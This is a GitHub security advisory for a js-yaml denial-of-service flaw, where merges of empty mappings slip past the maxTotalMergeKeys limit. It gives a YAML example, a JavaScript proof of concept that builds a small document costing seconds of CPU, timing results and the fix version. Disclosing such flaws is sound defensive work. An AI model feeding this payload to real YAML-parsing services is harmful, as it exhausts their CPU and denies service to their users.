GHSA-r3ph-w7gj-g6xm

Suggest an improvement
Source
https://github.com/advisories/GHSA-r3ph-w7gj-g6xm
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-r3ph-w7gj-g6xm/GHSA-r3ph-w7gj-g6xm.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-r3ph-w7gj-g6xm
Downstream
CGA (2)
CLSA (1)
MINI (4)
Published
2026-09-29T17:57:39Z
Modified
2026-09-29T18:15:05Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVSS Calculator
Summary
js-yaml: maxTotalMergeKeys does not limit CPU use for empty merge sources
Details

Summary

maxTotalMergeKeys does not count empty mappings. An attacker can repeatedly merge a large sequence of them and consume significant CPU without reaching the configured limit.

Example

arr: &arr [{}, {}, {}, ...] # N empty mappings
targets:
  - <<: *arr                # repeated K times

For every target, the loader iterates all N elements of arr. This results in O(N * K) work while totalMergeKeys remains unchanged.

PoC

import { performance } from 'node:perf_hooks'
import { load, YAML11_SCHEMA } from 'js-yaml'

const n = 20000

const src =
  'arr: &arr [' + '{},'.repeat(n).slice(0, -1) + ']\n' +
  'targets:\n' +
  '  - <<: *arr\n'.repeat(n)

const started = performance.now()

load(src, { schema: YAML11_SCHEMA })

console.log(`${(performance.now() - started).toFixed(1)} ms`)

Observed results:

N YAML size Time
800 ~13 KB ~20 ms
3200 ~50 KB ~180 ms
20000 ~500 KB ~13 s

Impact

When merge keys are enabled, an attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default maxTotalMergeKeys limit.

Fix

Count every merge source mapping as one budget unit in addition to counting its keys.

Database specific
{
    "cwe_ids":  [
        "CWE-400",
        "CWE-407"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-09-29T17:57:39Z",
    "nvd_published_at":  null,
    "severity":  "MODERATE"
}
References

Affected packages

npm / js-yaml

Package

Affected ranges

Type
SEMVER
Events
Introduced
5.0.0
Fixed
5.4.1

Database specific

last_known_affected_version_range
"<= 5.4.0"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-r3ph-w7gj-g6xm/GHSA-r3ph-w7gj-g6xm.json"